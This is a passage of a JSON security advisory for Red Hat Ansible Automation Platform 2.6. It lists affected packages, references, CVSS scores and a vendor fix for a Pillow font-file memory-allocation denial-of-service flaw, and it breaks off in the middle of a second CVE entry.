"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el9ap.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-54060"
},
{
"category": "external",
"summary": "RHBZ#2497466",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2497466"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-54060",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-54060"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-54060",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-54060"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/blob/main/docs/releasenotes/12.3.0.rst",
"url": "https://github.com/python-pillow/Pillow/blob/main/docs/releasenotes/12.3.0.rst"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/commit/0a263e6264aa5399988d9acd3bbfbca2ca3ec77d",
"url": "https://github.com/python-pillow/Pillow/commit/0a263e6264aa5399988d9acd3bbfbca2ca3ec77d"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-5x94-69rx-g8h2",
"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-5x94-69rx-g8h2"
}
],
"release_date": "2026-07-06T18:49:23.788000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T18:56:41+00:00",
"details": "For details on how to apply this update, refer to Ansible Automation Platform documentation.",
"product_ids": [
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50336"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "python-pillow: Pillow: Denial of Service via excessive memory allocation when processing font files"
},
{
"cve": "CVE-2026-55379",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-07-06T20:01:29.922515+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
